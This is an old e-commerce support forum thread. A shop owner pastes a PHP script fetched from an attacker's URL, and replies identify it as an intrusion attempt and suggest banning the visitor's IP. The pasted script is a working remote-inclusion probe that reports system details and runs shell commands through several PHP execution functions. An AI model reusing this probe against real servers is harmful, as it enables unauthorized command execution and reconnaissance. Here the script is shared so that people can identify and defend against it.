Guest Posted February 13, 2008 Posted February 13, 2008 Hi, People. I have a "customer" in my shop right now. I follow the link and get this: <?$ker = @php_uname(); $osx = @PHP_OS; echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; echo "Uname:$ker<br>"; echo "SySOs:$osx<br>"; if ($osx == "WINNT") { $xeQt="ipconfig -a"; } else { $xeQt="id"; } $hitemup=ex($xeQt); echo $hitemup; function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit; ?> What the h... is this? It comes from this site: http://hgdcg.e-lavirint.com/.css/n?
Jack_mcs Posted February 13, 2008 Posted February 13, 2008 It is someone trying to hack in. Getting his IP and banning it would be the first step. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons
Guest Posted February 13, 2008 Posted February 13, 2008 It is someone trying to hack in. Getting his IP and banning it would be the first step. Jack How can I do that?
Jack_mcs Posted February 14, 2008 Posted February 14, 2008 It's listed in admin->Tools->Who's Online if he is still there. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.